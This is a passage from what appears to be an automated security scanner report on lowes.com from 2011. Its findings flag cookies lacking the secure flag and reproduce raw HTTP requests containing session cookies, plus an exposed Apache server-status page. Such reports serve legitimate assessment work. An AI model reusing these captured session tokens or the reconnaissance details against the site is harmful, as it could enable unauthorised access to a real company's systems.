7.106. https://www.lowes.com/server-status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /server-status

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server-status HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; stop_mobi=yes; TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 12 Jul 2011 21:32:27 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Tue, 12-Jul-2011 22:02:26 GMT
Set-Cookie: TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c; Path=/
Content-Length: 353323

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for www.lowes.com</h1>

<dl><dt>Server Version: IBM_HTTP_Server
...[SNIP]...

7.107. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/css/main.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/main.css HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 05 Jul 2011 17:15:57 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 238055
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/* Reset CSS */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td,button{margin:0;padding:0}table{border-collapse:collapse;border-spacing:0}fieldset,img
...[SNIP]...

7.108. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jun 2011 11:20:33 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 60109
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/*
* common.js
* Common javascript to be run on every page of the Lowes.com web site.
*
* Copyright Lowes, Inc.
*
* Last Modified On 03/04/2010
* Modified By R. Adams
*/

var lowes=
...[SNIP]...

7.109. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jul 2009 13:05:12 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 154101
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/*
   This is a compiled version of Dojo, built for deployment and not for
   development. To get an editable version, please visit:

       http://dojotoolkit.org

   for documentation and information on
...[SNIP]...

7.110. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 15 Oct 2010 17:00:00 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 72756
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/*
   This is a compiled version of Dojo, built for deployment and not for
   development. To get an editable version, please visit:

       http://dojotoolkit.org

   for documentation and information on
...[SNIP]...

7.111. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; 